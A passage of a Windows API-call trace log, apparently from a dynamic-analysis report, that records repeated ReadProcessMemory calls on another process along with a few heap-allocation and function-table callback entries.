lpNumberOfBytesRead=0x0 | out: lpBuffer=0x22b34a4147c*, lpNumberOfBytesRead=0x0) returned 1 [0080.929] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0030, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0080.929] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb002c, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0080.929] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0028, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0080.929] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0024, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0080.929] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0020, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0080.930] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6f70070, lpBuffer=0x4c1ec76860, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76860*, lpNumberOfBytesRead=0x0) returned 1 [0080.930] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0020, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0080.931] OutOfProcessFunctionTableCallback () returned 0x0 [0080.931] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x9a63c0, lpBuffer=0x4c1ec76978, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76978*, lpNumberOfBytesRead=0x0) returned 1 [0080.931] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x9a63c0, lpBuffer=0x4c1ec76890, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76890*, lpNumberOfBytesRead=0x0) returned 1 [0080.932] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x9a63a0, lpBuffer=0x4c1ec76880, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76880*, lpNumberOfBytesRead=0x0) returned 1 [0080.932] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x9587b0, lpBuffer=0x4c1ec76868, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76868*, lpNumberOfBytesRead=0x0) returned 1 [0080.932] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6f70020, lpBuffer=0x4c1ec768a0, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec768a0*, lpNumberOfBytesRead=0x0) returned 1 [0080.932] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0050, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0080.932] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb004c, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0080.932] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0048, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0080.932] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6f70a08, lpBuffer=0x4c1ec76860, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76860*, lpNumberOfBytesRead=0x0) returned 1 [0080.932] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb1ad0, lpBuffer=0x4c1ec76858, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76858*, lpNumberOfBytesRead=0x0) returned 1 [0080.932] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0048, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0080.932] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0044, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0080.933] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0040, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0080.933] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6f70878, lpBuffer=0x4c1ec76860, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76860*, lpNumberOfBytesRead=0x0) returned 1 [0080.933] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb1800, lpBuffer=0x4c1ec76858, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76858*, lpNumberOfBytesRead=0x0) returned 1 [0080.933] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0040, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0080.933] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb003c, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0080.933] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0038, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0080.933] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0034, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0080.933] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0030, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0080.933] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6f704a8, lpBuffer=0x4c1ec76860, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76860*, lpNumberOfBytesRead=0x0) returned 1 [0080.933] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb11a0, lpBuffer=0x4c1ec76858, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76858*, lpNumberOfBytesRead=0x0) returned 1 [0080.933] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0030, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0080.934] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6f70478, lpBuffer=0x4c1ec76860, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76860*, lpNumberOfBytesRead=0x0) returned 1 [0080.934] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb1120, lpBuffer=0x4c1ec76858, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76858*, lpNumberOfBytesRead=0x0) returned 1 [0080.934] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0030, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0080.934] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb002c, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0080.934] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0028, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0080.934] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0024, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0080.934] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0020, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0080.934] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6f70070, lpBuffer=0x4c1ec76860, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76860*, lpNumberOfBytesRead=0x0) returned 1 [0080.934] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0020, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0080.934] GetProcessHeap () returned 0x22b349a0000 [0080.934] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x8, Size=0x48) returned 0x22b34a41a80 [0080.935] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0050, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0080.935] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb004c, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0080.935] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0048, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0080.935] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6f70a08, lpBuffer=0x4c1ec76860, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76860*, lpNumberOfBytesRead=0x0) returned 1 [0080.935] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb1ad0, lpBuffer=0x4c1ec76858, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76858*, lpNumberOfBytesRead=0x0) returned 1 [0080.935] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb1ad4, lpBuffer=0x22b34a41a80, nSize=0xc, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x22b34a41a80*, lpNumberOfBytesRead=0x0) returned 1 [0080.935] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb1ae0, lpBuffer=0x22b34a41a8c, nSize=0xc, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x22b34a41a8c*, lpNumberOfBytesRead=0x0) returned 1 [0080.935] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0048, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0080.935] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0044, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0080.935] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0040, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0080.936] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6f70878, lpBuffer=0x4c1ec76860, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76860*, lpNumberOfBytesRead=0x0) returned 1 [0080.936] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb1800, lpBuffer=0x4c1ec76858, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76858*, lpNumberOfBytesRead=0x0) returned 1 [0080.936] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb1804, lpBuffer=0x22b34a41a98, nSize=0xc, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x22b34a41a98*, lpNumberOfBytesRead=0x0) returned 1 [0080.936] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0040, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0080.936] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb003c, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0080.936] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0038, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0080.936] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0034, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0080.936] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0030, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0080.936] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6f704a8, lpBuffer=0x4c1ec76860, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76860*, lpNumberOfBytesRead=0x0) returned 1 [0080.936] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb11a0, lpBuffer=0x4c1ec76858, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76858*, lpNumberOfBytesRead=0x0) returned 1 [0080.936] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb11a4, lpBuffer=0x22b34a41aa4, nSize=0xc, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x22b34a41aa4*, lpNumberOfBytesRead=0x0) returned 1 [0080.937] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb11b0, lpBuffer=0x22b34a41ab0, nSize=0xc, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x22b34a41ab0*, lpNumberOfBytesRead=0x0) returned 1 [0080.937] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0030, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0080.937] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6f70478, lpBuffer=0x4c1ec76860, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76860*, lpNumberOfBytesRead=0x0) returned 1 [0080.937] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb1120, lpBuffer=0x4c1ec76858, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76858*, lpNumberOfBytesRead=0x0) returned 1 [0080.937] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb1124, lpBuffer=0x22b34a41abc, nSize=0xc, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x22b34a41abc*, lpNumberOfBytesRead=0x0) returned 1 [0080.937] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0030, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0080.937] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb002c, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0080.937] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0028, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0080.937] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0024, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0080.937] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0020, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0080.938] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6f70070, lpBuffer=0x4c1ec76860, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76860*, lpNumberOfBytesRead=0x0) returned 1 [0080.938] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0020, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0080.939] OutOfProcessFunctionTableCallback () returned 0x0 [0080.939] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x9a63c0, lpBuffer=0x4c1ec76978, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76978*, lpNumberOfBytesRead=0x0) returned 1 [0080.939] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x9a63c0, lpBuffer=0x4c1ec76890, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76890*, lpNumberOfBytesRead=0x0) returned 1 [0080.939] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x9a63a0, lpBuffer=0x4c1ec76880, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76880*, lpNumberOfBytesRead=0x0) returned 1 [0080.939] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x9587b0, lpBuffer=0x4c1ec76868, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76868*, lpNumberOfBytesRead=0x0) returned 1 [0080.939] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6f70020, lpBuffer=0x4c1ec768a0, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec768a0*, lpNumberOfBytesRead=0x0) returned 1 [0080.939] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0050, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0080.939] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb004c, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0080.939] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0048, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0080.940] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6f70a08, lpBuffer=0x4c1ec76860, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76860*, lpNumberOfBytesRead=0x0) returned 1 [0080.940] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb1ad0, lpBuffer=0x4c1ec76858, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76858*, lpNumberOfBytesRead=0x0) returned 1 [0080.940] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0048, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0080.940] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0044, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0080.940] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0040, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0080.940] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6f70878, lpBuffer=0x4c1ec76860, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76860*, lpNumberOfBytesRead=0x0) returned 1 [0080.940] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb1800, lpBuffer=0x4c1ec76858, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76858*, lpNumberOfBytesRead=0x0) returned 1 [0080.940] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0040, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0081.137] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb003c, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0081.137] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0038, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0081.137] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0034, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0081.137] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0030, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0081.137] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6f704a8, lpBuffer=0x4c1ec76860, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76860*, lpNumberOfBytesRead=0x0) returned 1 [0081.137] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb11a0, lpBuffer=0x4c1ec76858, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76858*, lpNumberOfBytesRead=0x0) returned 1 [0081.138] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0030, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0081.138] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6f70478, lpBuffer=0x4c1ec76860, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76860*, lpNumberOfBytesRead=0x0) returned 1 [0081.138] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb1120, lpBuffer=0x4c1ec76858, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76858*, lpNumberOfBytesRead=0x0) returned 1 [0081.138] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0030, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0081.138] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb002c, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0081.138] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0028, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0081.138] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0024, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0081.138] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0020, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0081.138] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6f70070, lpBuffer=0x4c1ec76860, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76860*, lpNumberOfBytesRead=0x0) returned 1 [0081.138] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0020, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0081.138] GetProcessHeap () returned 0x22b349a0000 [0081.139] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x8, Size=0x48) returned 0x22b34a41da0 [0081.139] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0050, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0081.139] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb004c, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0081.139] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0048, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0081.139] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6f70a08, lpBuffer=0x4c1ec76860, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76860*, lpNumberOfBytesRead=0x0) returned 1 [0081.139] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb1ad0, lpBuffer=0x4c1ec76858, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76858*, lpNumberOfBytesRead=0x0) returned 1 [0081.139] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb1ad4, lpBuffer=0x22b34a41da0, nSize=0xc, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x22b34a41da0*, 